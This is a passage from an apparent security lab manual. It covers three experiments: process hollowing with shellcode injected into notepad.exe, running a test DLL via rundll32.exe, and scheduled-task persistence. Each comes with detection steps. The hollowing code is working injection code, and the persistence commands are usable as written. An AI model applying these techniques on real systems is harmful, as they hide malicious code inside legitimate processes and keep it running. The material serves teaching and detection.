"\x8b\x42\x3c\x8b\x40\x78\x85\xc0\x74\x4c\x01\xd0\x50\x8b\x58"

"\x20\x01\xd3\x8b\x48\x18\x50\x8b\x58\x24\x01\xd3\x66\x8b\x0c"

"\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24"

"\x5f\x5e\x59\x5a\x51\xff\xe0\x5f\x5e\x5b\x5d\x68\x63\x61\x6c"
"\x63\x54\xbb\xc7\x93\xc2\x77\xff\xd3";

// Start the legitimate process in suspended mode

if (!CreateProcess(NULL, "C:\\Windows\\System32\\notepad.exe",

NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi)) {

printf("[-] Failed to create process.\n");

return -1;

printf("[+] Created suspended process: Notepad.exe\n");

// Allocate memory in the remote process

pRemoteBuffer = VirtualAllocEx(pi.hProcess, NULL, sizeof(payload),

MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

if (!pRemoteBuffer) {

printf("[-] Failed to allocate memory.\n");

return -1;

// Write payload into allocated memory

if (!WriteProcessMemory(pi.hProcess, pRemoteBuffer, payload, sizeof(payload), &bytesWritten)) {

printf("[-] Failed to write payload.\n");

return -1;

// Get thread context

ctx.ContextFlags = CONTEXT_FULL;

if (!GetThreadContext(pi.hThread, &ctx)) {

printf("[-] Failed to get thread context.\n");

return -1;
}

// Set EIP to point to the payload

#ifdef _WIN64

ctx.Rip = (DWORD64)pRemoteBuffer;

#else

ctx.Eip = (DWORD)pRemoteBuffer;

#endif

if (!SetThreadContext(pi.hThread, &ctx)) {

printf("[-] Failed to set thread context.\n");

return -1;

// Resume the process, executing the injected shellcode

ResumeThread(pi.hThread);

printf("[+] Process Hollowing complete! Payload executed.\n");

CloseHandle(pi.hProcess);

CloseHandle(pi.hThread);

return 0;

Running the Process Hollowing Code

Use MinGW or Visual Studio to compile the program:

gcc -o process_hollowing.exe process_hollowing.c -luser32 -lkernel32

Execute the Program

Run the compiled process_hollowing.exe as Administrator.

Observe that notepad.exe launches but runs malicious code instead.

Detecting Process Hollowing


Use Process Explorer

Open Process Explorer and inspect notepad.exe.

Check the process command line arguments and memory regions for anomalies.

Use Process Hacker

Look at the memory region of notepad.exe to see if its executable section has been modified.

Use Sysmon for Logging

Install Sysmon and configure rules to detect:

Suspended processes

Memory allocations

Thread context modifications

sysmon -accepteula -i

wevtutil qe Microsoft-Windows-Sysmon/Operational /f:text

Use x64dbg/OllyDbg

Attach to notepad.exe and inspect the memory.

Look for execution at an unexpected memory location.

Result:

The experiment successfully demonstrated the Process Injection using Process Hollowing
EXP No: 5 (ii)
Executing Malware using rundll32.exe
Date :

Aim
To Understand how rundll32.exe can be used to execute malware, Create a malicious DLL that executes
a payload and to Analyze and detect the execution using forensic tools.
Required Tools

 Windows Virtual Machine


 C/C++ Compiler (MinGW or Visual Studio).
 rundll32.exe (built-in Windows tool).
 Process Explorer / Process Hacker.
 Sysmon (for logging process execution).
 x64dbg / OllyDbg (for debugging DLL execution).
Writing a Malicious DLL
Create a DLL that Executes a Malicious Payload
#include <windows.h>
#include <stdio.h>
void WINAPI RunPayload(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
MessageBox(NULL, "Malicious DLL Executed!", "DLL Execution", MB_OK |
MB_ICONWARNING);
system("cmd.exe /c echo Malicious DLL Executed && pause");
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
RunPayload(NULL, NULL, NULL, 0);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
Compiling and Running the Malicious DLL
Compile the DLL
Compile the DLL using MinGW or Visual Studio:
Using MinGW:
gcc -shared -o malicious.dll malicious.c -Wall

Execute the DLL using rundll32.exe


Windows provides rundll32.exe, which can be abused to execute DLL functions.
Run the following command in Command Prompt (cmd.exe):
rundll32.exe malicious.dll,RunPayload

Analyzing and Detecting the Attack


Use Process Explorer
Open Process Explorer (procexp.exe from Sysinternals Suite).
Look for rundll32.exe and inspect the command-line arguments.
Identify any suspicious DLL being loaded.

Use Sysmon for Logging Execution


Install Sysmon:
sysmon -accepteula -i
Check event logs for rundll32.exe executions:
wevtutil qe Microsoft-Windows-Sysmon/Operational /f:text

Use x64dbg/OllyDbg
Attach a debugger to rundll32.exe.
Set breakpoints in DllMain to observe execution flow.
Result:
The experiment successfully demonstrated the Executing Malware using rundll32.exe
EXP No: 5 (iii)
Persistence via Scheduled Tasks
Date :

Aim: To understand how attackers use Scheduled Tasks (Windows Task Scheduler) to maintain persistence
on a compromised Windows system.
Requirements:
A Windows VM (e.g., Windows 10/11)
Administrator privileges on the system
A test script or executable (e.g., a simple .bat file or reverse shell)
Tools: schtasks.exe, PowerShell, or Sysinternals' Autoruns
Procedure:
1. Create a Payload Script (For Testing Purpose)
@echo off
echo Persistence achieved! >> C:\Users\Public\persistence_log.txt
Save this as persistence.bat
2. Create a Scheduled Task using schtasks
Open Command Prompt as Administrator, then run:
schtasks /create /sc minute /mo 1 /tn "PersistenceTask" /tr "C:\Tools\persistence.bat"
/sc minute – runs the task every minute
/mo 1 – modifier, every 1 minute
/tn – task name
/tr – the command to run
3. Verify the Scheduled Task
schtasks /query /tn "PersistenceTask" /v /fo list
4. Monitor Persistence with Autoruns
Download and run Autoruns
Go to the Scheduled Tasks tab
Look for PersistenceTask
5. Clean Up (Remove the Task)
schtasks /delete /tn "PersistenceTask" /f
Result
The experiment successfully demonstrated the Scheduled Task technique for persistence.

You might also like